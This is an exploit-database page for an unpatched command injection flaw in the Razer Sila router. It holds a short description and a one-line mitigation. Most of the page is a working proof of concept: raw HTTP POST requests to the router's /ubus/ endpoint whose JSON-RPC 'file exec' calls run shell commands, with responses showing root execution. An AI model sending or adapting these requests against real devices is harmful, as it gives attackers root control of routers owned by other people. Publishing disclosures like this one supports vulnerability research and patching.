header-logo
Suggest Exploit
vendor:
Razer Sila
by:
Kevin Randall
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Razer Sila
Affected Version From: RazerSila-2.0.441_api-2.0.418
Affected Version To: RazerSila-2.0.441_api-2.0.418
Patch Exists: NO
Related CWE:
CPE: h:razer:razer_sila
Metasploit:
Other Scripts:
Platforms Tested: Razer Sila Router
2022

Razer Sila – Command Injection

A command injection vulnerability exists in the Razer Sila router. An attacker can send a malicious POST request to the router's ubus service, which allows them to execute arbitrary commands with root privileges. The attacker can send a POST request containing a JSON-RPC call with the command parameter set to the command they wish to execute.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in system commands.
Source

Exploit-DB raw data:

# Exploit Title: Razer Sila - Command Injection
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

# Proof of Concept

# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}

# Response
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 85

{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}

# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}

# Response
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 172

{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}

Navigation

Suggest Exploit

Services By CQR